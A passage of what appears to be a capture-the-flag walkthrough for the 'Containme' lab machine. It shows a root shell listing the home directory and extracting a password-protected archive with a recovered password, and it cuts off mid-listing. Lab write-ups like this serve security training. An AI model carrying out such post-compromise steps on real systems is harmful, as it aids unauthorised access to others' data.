root@host2:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@host2:~# ls -alh
ls -alh
total 28K
drwx------  4 root root 4.0K Jul 19  2021 .
drwxr-xr-x 22 root root 4.0K Jun 29  2021 ..
lrwxrwxrwx  1 root root    9 Jul 19  2021 .bash_history -> /dev/null
-rw-r--r--  1 root root 3.1K Apr  9  2018 .bashrc
drwxr-xr-x  3 root root 4.0K Jul 15  2021 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwx------  2 root root 4.0K Jul 15  2021 .ssh
-rw-------  1 root root  218 Jul 16  2021 mike.zip
root@host2:~# unzip mike.zip
unzip mike.zip
Archive:  mike.zip
[mike.zip] mike password: 

   skipping: mike                    incorrect password
root@host2:~# unzip mike.zip
unzip mike.zip
Archive:  mike.zip
[mike.zip] mike password: WhatAreYouDoingHere

 extracting: mike                    
root@host2:~# ls
ls
mike  mike.zip
root@host2:~# ls -alh
ls -alh
total 32K
drwx------  4 root root 4.0K Nov  6 17:28 .
drwxr-xr-x 22 root root 4.0K Jun 29  2021 ..
lrwxrwxrwx  1 root root    9 Jul 19  2021 .bash_history -> /dev/null
-rw-r--r--  1 root root 3.1K Apr  9  2018 .bashrc
drwxr-xr-x  3 root root 4.0K Jul 15  2021 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwx------  2 root root 4.0K J

标签:4.0,--,drwxr,THM,Vulnhub,xr,Containme,root,2021
From: https://www.cnblogs.com/jason-huawen/p/16863309.html

相关文章